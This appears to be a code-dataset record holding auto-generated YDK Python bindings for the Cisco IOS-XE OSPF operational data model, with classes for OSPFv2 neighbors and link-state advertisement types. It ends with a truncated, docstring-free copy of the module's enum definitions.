attribute:: dead_timer The dead timer in seconds **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.Ospfv2Neighbor, self).__init__() self.yang_name = "ospfv2-neighbor" self.yang_parent_name = "ospfv2-interface" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['nbr_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('nbr_id', (YLeaf(YType.uint32, 'nbr-id'), ['int'])), ('address', (YLeaf(YType.str, 'address'), ['str','str'])), ('dr', (YLeaf(YType.uint32, 'dr'), ['int'])), ('bdr', (YLeaf(YType.uint32, 'bdr'), ['int'])), ('dr_ip', (YLeaf(YType.str, 'dr-ip'), ['str','str'])), ('bdr_ip', (YLeaf(YType.str, 'bdr-ip'), ['str','str'])), ('event_count', (YLeaf(YType.uint32, 'event-count'), ['int'])), ('retrans_count', (YLeaf(YType.uint32, 'retrans-count'), ['int'])), ('state', (YLeaf(YType.enumeration, 'state'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'NbrStateType', '')])), ('dead_timer', (YLeaf(YType.uint32, 'dead-timer'), ['int'])), ]) self.nbr_id = None self.address = None self.dr = None self.bdr = None self.dr_ip = None self.bdr_ip = None self.event_count = None self.retrans_count = None self.state = None self.dead_timer = None self._segment_path = lambda: "ospfv2-neighbor" + "[nbr-id='" + str(self.nbr_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.Ospfv2Neighbor, ['nbr_id', 'address', 'dr', 'bdr', 'dr_ip', 'bdr_ip', 'event_count', 'retrans_count', 'state', 'dead_timer'], name, value) class Ospfv2LsdbExternal(Entity): """ The external LSDB information .. attribute:: lsa_type (key) Link State Advertisement type **type**\: int **range:** 0..255 **config**\: False .. 
attribute:: lsa_id (key) Link State Advertisement Identifer **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: advertising_router (key) Advertising router **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: lsa_age The age of the Link State Advertisement **type**\: int **range:** 0..65535 **config**\: False .. attribute:: lsa_options The options of the Link State Advertisement **type**\: :py:class:`Ospfv2LsaFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2LsaFlagOptions>` **config**\: False .. attribute:: lsa_seq_number The sequence number for the Link State Advertisement **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: lsa_checksum The checksum of the Link State Advertisement **type**\: int **range:** 0..65535 **config**\: False .. attribute:: lsa_length The length, in bytes, of the Link State Advertisement **type**\: int **range:** 0..65535 **config**\: False .. attribute:: ospfv2_router_lsa_links The router Link State Advertisement links **type**\: list of :py:class:`Ospfv2RouterLsaLinks <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks>` **config**\: False .. attribute:: unsupported_lsa The unsupported Link State Advertisements **type**\: :py:class:`UnsupportedLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.UnsupportedLsa>` **config**\: False .. attribute:: router_lsa The router Link State Advertisements **type**\: :py:class:`RouterLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterLsa>` **config**\: False .. attribute:: network_lsa The network Link State Advertisements **type**\: :py:class:`NetworkLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkLsa>` **config**\: False .. 
attribute:: network_summary_lsa The network summary Link State Advertisements **type**\: :py:class:`NetworkSummaryLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa>` **config**\: False .. attribute:: router_summary_lsa The router summary Link State Advertisements **type**\: :py:class:`RouterSummaryLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa>` **config**\: False .. attribute:: external_lsa The external Link State Advertisements **type**\: :py:class:`ExternalLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa>` **config**\: False .. attribute:: nssa_lsa The Not So Stubby Area Link state advertisements **type**\: :py:class:`NssaLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal, self).__init__() self.yang_name = "ospfv2-lsdb-external" self.yang_parent_name = "ospfv2-instance" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['lsa_type','lsa_id','advertising_router'] self._child_classes = OrderedDict([("ospfv2-router-lsa-links", ("ospfv2_router_lsa_links", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks)), ("unsupported-lsa", ("unsupported_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.UnsupportedLsa)), ("router-lsa", ("router_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterLsa)), ("network-lsa", ("network_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkLsa)), ("network-summary-lsa", ("network_summary_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa)), ("router-summary-lsa", ("router_summary_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa)), 
("external-lsa", ("external_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa)), ("nssa-lsa", ("nssa_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa))]) self._leafs = OrderedDict([ ('lsa_type', (YLeaf(YType.uint8, 'lsa-type'), ['int'])), ('lsa_id', (YLeaf(YType.uint32, 'lsa-id'), ['int'])), ('advertising_router', (YLeaf(YType.uint32, 'advertising-router'), ['int'])), ('lsa_age', (YLeaf(YType.uint16, 'lsa-age'), ['int'])), ('lsa_options', (YLeaf(YType.bits, 'lsa-options'), ['Bits'])), ('lsa_seq_number', (YLeaf(YType.uint32, 'lsa-seq-number'), ['int'])), ('lsa_checksum', (YLeaf(YType.uint16, 'lsa-checksum'), ['int'])), ('lsa_length', (YLeaf(YType.uint16, 'lsa-length'), ['int'])), ]) self.lsa_type = None self.lsa_id = None self.advertising_router = None self.lsa_age = None self.lsa_options = Bits() self.lsa_seq_number = None self.lsa_checksum = None self.lsa_length = None self.unsupported_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.UnsupportedLsa() self.unsupported_lsa.parent = self self._children_name_map["unsupported_lsa"] = "unsupported-lsa" self.router_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterLsa() self.router_lsa.parent = self self._children_name_map["router_lsa"] = "router-lsa" self.network_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkLsa() self.network_lsa.parent = self self._children_name_map["network_lsa"] = "network-lsa" self.network_summary_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa() self.network_summary_lsa.parent = self self._children_name_map["network_summary_lsa"] = "network-summary-lsa" self.router_summary_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa() self.router_summary_lsa.parent = self self._children_name_map["router_summary_lsa"] = "router-summary-lsa" self.external_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa() self.external_lsa.parent = self self._children_name_map["external_lsa"] = "external-lsa" 
self.nssa_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa() self.nssa_lsa.parent = self self._children_name_map["nssa_lsa"] = "nssa-lsa" self.ospfv2_router_lsa_links = YList(self) self._segment_path = lambda: "ospfv2-lsdb-external" + "[lsa-type='" + str(self.lsa_type) + "']" + "[lsa-id='" + str(self.lsa_id) + "']" + "[advertising-router='" + str(self.advertising_router) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal, ['lsa_type', 'lsa_id', 'advertising_router', 'lsa_age', 'lsa_options', 'lsa_seq_number', 'lsa_checksum', 'lsa_length'], name, value) class Ospfv2RouterLsaLinks(Entity): """ The router Link State Advertisement links .. attribute:: link_type (key) Link Type **type**\: int **range:** 0..255 **config**\: False .. attribute:: link_id (key) link Identifier **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: link_data (key) link data **type**\: int **range:** 0..4294967295 **config**\: False .. 
attribute:: link_topo Link topology **type**\: list of :py:class:`LinkTopo <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks.LinkTopo>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks, self).__init__() self.yang_name = "ospfv2-router-lsa-links" self.yang_parent_name = "ospfv2-lsdb-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['link_type','link_id','link_data'] self._child_classes = OrderedDict([("link-topo", ("link_topo", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks.LinkTopo))]) self._leafs = OrderedDict([ ('link_type', (YLeaf(YType.uint8, 'link-type'), ['int'])), ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])), ('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])), ]) self.link_type = None self.link_id = None self.link_data = None self.link_topo = YList(self) self._segment_path = lambda: "ospfv2-router-lsa-links" + "[link-type='" + str(self.link_type) + "']" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks, ['link_type', 'link_id', 'link_data'], name, value) class LinkTopo(Entity): """ Link topology .. attribute:: mt_id Multi topology identifier **type**\: int **range:** 0..255 **config**\: False .. 
attribute:: topo_metric Topology metric **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks.LinkTopo, self).__init__() self.yang_name = "link-topo" self.yang_parent_name = "ospfv2-router-lsa-links" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])), ('topo_metric', (YLeaf(YType.uint16, 'topo-metric'), ['int'])), ]) self.mt_id = None self.topo_metric = None self._segment_path = lambda: "link-topo" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks.LinkTopo, ['mt_id', 'topo_metric'], name, value) class UnsupportedLsa(Entity): """ The unsupported Link State Advertisements .. attribute:: lsa_data Link State Advertisement data **type**\: list of int **range:** 0..255 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.UnsupportedLsa, self).__init__() self.yang_name = "unsupported-lsa" self.yang_parent_name = "ospfv2-lsdb-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('lsa_data', (YLeafList(YType.uint8, 'lsa-data'), ['int'])), ]) self.lsa_data = [] self._segment_path = lambda: "unsupported-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.UnsupportedLsa, ['lsa_data'], name, value) class RouterLsa(Entity): """ The router Link State Advertisements .. 
attribute:: router_lsa_bits Router Link State Advertisement bits **type**\: :py:class:`Ospfv2RouterLsaBits <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2RouterLsaBits>` **config**\: False .. attribute:: router_lsa_number_links Router Link State Advertisement number of links **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterLsa, self).__init__() self.yang_name = "router-lsa" self.yang_parent_name = "ospfv2-lsdb-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('router_lsa_bits', (YLeaf(YType.bits, 'router-lsa-bits'), ['Bits'])), ('router_lsa_number_links', (YLeaf(YType.uint16, 'router-lsa-number-links'), ['int'])), ]) self.router_lsa_bits = Bits() self.router_lsa_number_links = None self._segment_path = lambda: "router-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterLsa, ['router_lsa_bits', 'router_lsa_number_links'], name, value) class NetworkLsa(Entity): """ The network Link State Advertisements .. attribute:: network_lsa_mask Network Link State Advertisement mask **type**\: int **range:** 0..4294967295 **config**\: False .. 
attribute:: network_attached_routers Network attached routers **type**\: list of int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkLsa, self).__init__() self.yang_name = "network-lsa" self.yang_parent_name = "ospfv2-lsdb-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('network_lsa_mask', (YLeaf(YType.uint32, 'network-lsa-mask'), ['int'])), ('network_attached_routers', (YLeafList(YType.uint32, 'network-attached-routers'), ['int'])), ]) self.network_lsa_mask = None self.network_attached_routers = [] self._segment_path = lambda: "network-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkLsa, ['network_lsa_mask', 'network_attached_routers'], name, value) class NetworkSummaryLsa(Entity): """ The network summary Link State Advertisements .. attribute:: summary_lsa_mask The summary Link State Advertisement mask **type**\: int **range:** 0..4294967295 **config**\: False .. 
attribute:: summary_topo The summary topology **type**\: list of :py:class:`SummaryTopo <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa.SummaryTopo>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa, self).__init__() self.yang_name = "network-summary-lsa" self.yang_parent_name = "ospfv2-lsdb-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("summary-topo", ("summary_topo", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa.SummaryTopo))]) self._leafs = OrderedDict([ ('summary_lsa_mask', (YLeaf(YType.uint32, 'summary-lsa-mask'), ['int'])), ]) self.summary_lsa_mask = None self.summary_topo = YList(self) self._segment_path = lambda: "network-summary-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa, ['summary_lsa_mask'], name, value) class SummaryTopo(Entity): """ The summary topology .. attribute:: mt_id Multi topology identifier **type**\: int **range:** 0..255 **config**\: False .. 
attribute:: topo_metric Topology Metric **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa.SummaryTopo, self).__init__() self.yang_name = "summary-topo" self.yang_parent_name = "network-summary-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])), ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])), ]) self.mt_id = None self.topo_metric = None self._segment_path = lambda: "summary-topo" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa.SummaryTopo, ['mt_id', 'topo_metric'], name, value) class RouterSummaryLsa(Entity): """ The router summary Link State Advertisements .. attribute:: summary_lsa_mask The summary Link State Advertisement mask **type**\: int **range:** 0..4294967295 **config**\: False .. 
attribute:: summary_topo The summary topology **type**\: list of :py:class:`SummaryTopo <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa.SummaryTopo>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa, self).__init__() self.yang_name = "router-summary-lsa" self.yang_parent_name = "ospfv2-lsdb-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("summary-topo", ("summary_topo", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa.SummaryTopo))]) self._leafs = OrderedDict([ ('summary_lsa_mask', (YLeaf(YType.uint32, 'summary-lsa-mask'), ['int'])), ]) self.summary_lsa_mask = None self.summary_topo = YList(self) self._segment_path = lambda: "router-summary-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa, ['summary_lsa_mask'], name, value) class SummaryTopo(Entity): """ The summary topology .. attribute:: mt_id Multi topology identifier **type**\: int **range:** 0..255 **config**\: False .. 
attribute:: topo_metric Topology Metric **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa.SummaryTopo, self).__init__() self.yang_name = "summary-topo" self.yang_parent_name = "router-summary-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])), ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])), ]) self.mt_id = None self.topo_metric = None self._segment_path = lambda: "summary-topo" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa.SummaryTopo, ['mt_id', 'topo_metric'], name, value) class ExternalLsa(Entity): """ The external Link State Advertisements .. attribute:: external_lsa_mask The mask for the external Link State Advertisement **type**\: int **range:** 0..4294967295 **config**\: False .. 
attribute:: external_topo The external topology Link State Advertisement **type**\: list of :py:class:`ExternalTopo <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa.ExternalTopo>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa, self).__init__() self.yang_name = "external-lsa" self.yang_parent_name = "ospfv2-lsdb-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("external-topo", ("external_topo", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa.ExternalTopo))]) self._leafs = OrderedDict([ ('external_lsa_mask', (YLeaf(YType.uint32, 'external-lsa-mask'), ['int'])), ]) self.external_lsa_mask = None self.external_topo = YList(self) self._segment_path = lambda: "external-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa, ['external_lsa_mask'], name, value) class ExternalTopo(Entity): """ The external topology Link State Advertisement .. attribute:: mt_id The multi topology identifier **type**\: int **range:** 0..255 **config**\: False .. attribute:: topo_metric_type The topoligy metric type associated with the Link State Advertisement **type**\: :py:class:`OspfExternalMetricType <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfExternalMetricType>` **config**\: False .. attribute:: topo_metric The topology metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: topo_forwarding_address The topology forwarding address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? 
**type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: topo_route_tag The topology route tag **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa.ExternalTopo, self).__init__() self.yang_name = "external-topo" self.yang_parent_name = "external-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])), ('topo_metric_type', (YLeaf(YType.enumeration, 'topo-metric-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfExternalMetricType', '')])), ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])), ('topo_forwarding_address', (YLeaf(YType.str, 'topo-forwarding-address'), ['str','str'])), ('topo_route_tag', (YLeaf(YType.uint32, 'topo-route-tag'), ['int'])), ]) self.mt_id = None self.topo_metric_type = None self.topo_metric = None self.topo_forwarding_address = None self.topo_route_tag = None self._segment_path = lambda: "external-topo" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa.ExternalTopo, ['mt_id', 'topo_metric_type', 'topo_metric', 'topo_forwarding_address', 'topo_route_tag'], name, value) class NssaLsa(Entity): """ The Not So Stubby Area Link state advertisements .. attribute:: external_lsa_mask The mask for the external Link State Advertisement **type**\: int **range:** 0..4294967295 **config**\: False .. 
attribute:: external_topo The external topology Link State Advertisement **type**\: list of :py:class:`ExternalTopo <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa.ExternalTopo>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa, self).__init__() self.yang_name = "nssa-lsa" self.yang_parent_name = "ospfv2-lsdb-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("external-topo", ("external_topo", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa.ExternalTopo))]) self._leafs = OrderedDict([ ('external_lsa_mask', (YLeaf(YType.uint32, 'external-lsa-mask'), ['int'])), ]) self.external_lsa_mask = None self.external_topo = YList(self) self._segment_path = lambda: "nssa-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa, ['external_lsa_mask'], name, value) class ExternalTopo(Entity): """ The external topology Link State Advertisement .. attribute:: mt_id The multi topology identifier **type**\: int **range:** 0..255 **config**\: False .. attribute:: topo_metric_type The topoligy metric type associated with the Link State Advertisement **type**\: :py:class:`OspfExternalMetricType <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfExternalMetricType>` **config**\: False .. attribute:: topo_metric The topology metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: topo_forwarding_address The topology forwarding address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? 
**type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: topo_route_tag The topology route tag **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa.ExternalTopo, self).__init__() self.yang_name = "external-topo" self.yang_parent_name = "nssa-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])), ('topo_metric_type', (YLeaf(YType.enumeration, 'topo-metric-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfExternalMetricType', '')])), ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])), ('topo_forwarding_address', (YLeaf(YType.str, 'topo-forwarding-address'), ['str','str'])), ('topo_route_tag', (YLeaf(YType.uint32, 'topo-route-tag'), ['int'])), ]) self.mt_id = None self.topo_metric_type = None self.topo_metric = None self.topo_forwarding_address = None self.topo_route_tag = None self._segment_path = lambda: "external-topo" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa.ExternalTopo, ['mt_id', 'topo_metric_type', 'topo_metric', 'topo_forwarding_address', 'topo_route_tag'], name, value) def clone_ptr(self): self._top_entity = OspfOperData() return self._top_entity
53.996849
1,779
0.368293
from collections import OrderedDict from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64 from ydk.filters import YFilter from ydk.errors import YError, YModelError from ydk.errors.error_handler import handle_type_error as _handle_type_error class AddressFamily(Enum): address_family_ipv4 = Enum.YLeaf(0, "address-family-ipv4") address_family_ipv6 = Enum.YLeaf(1, "address-family-ipv6") class NbrStateType(Enum): ospf_nbr_down = Enum.YLeaf(1, "ospf-nbr-down") ospf_nbr_attempt = Enum.YLeaf(2, "ospf-nbr-attempt") ospf_nbr_init = Enum.YLeaf(3, "ospf-nbr-init") ospf_nbr_two_way = Enum.YLeaf(4, "ospf-nbr-two-way") ospf_nbr_exchange_start = Enum.YLeaf(5, "ospf-nbr-exchange-start") ospf_nbr_exchange = Enum.YLeaf(6, "ospf-nbr-exchange") ospf_nbr_loading = Enum.YLeaf(7, "ospf-nbr-loading") ospf_nbr_full = Enum.YLeaf(8, "ospf-nbr-full") class OspfAuthType(Enum): ospf_auth_ipsec = Enum.YLeaf(0, "ospf-auth-ipsec") ospf_auth_trailer_keychain = Enum.YLeaf(1, "ospf-auth-trailer-keychain") ospf_auth_trailer_key = Enum.YLeaf(2, "ospf-auth-trailer-key") ospf_auth_type_none = Enum.YLeaf(3, "ospf-auth-type-none") class OspfExternalMetricType(Enum): ospf_ext_metric_type_1 = Enum.YLeaf(0, "ospf-ext-metric-type-1") ospf_ext_metric_type_2 = Enum.YLeaf(1, "ospf-ext-metric-type-2") class OspfNetworkType(Enum): ospf_broadcast = Enum.YLeaf(0, "ospf-broadcast") ospf_non_broadcast = Enum.YLeaf(1, "ospf-non-broadcast") ospf_point_to_multipoint = Enum.YLeaf(2, "ospf-point-to-multipoint") ospf_point_to_point = Enum.YLeaf(3, "ospf-point-to-point") class OspfOperationMode(Enum): ospf_ships_in_the_night = Enum.YLeaf(0, "ospf-ships-in-the-night") class Ospfv2AuthTypeSelection(Enum): ospfv2_auth_none = Enum.YLeaf(0, "ospfv2-auth-none") ospfv2_auth_trailer_key = Enum.YLeaf(1, "ospfv2-auth-trailer-key") ospfv2_auth_trailer_key_chain = Enum.YLeaf(2, "ospfv2-auth-trailer-key-chain") class Ospfv2CryptoAlgorithm(Enum): 
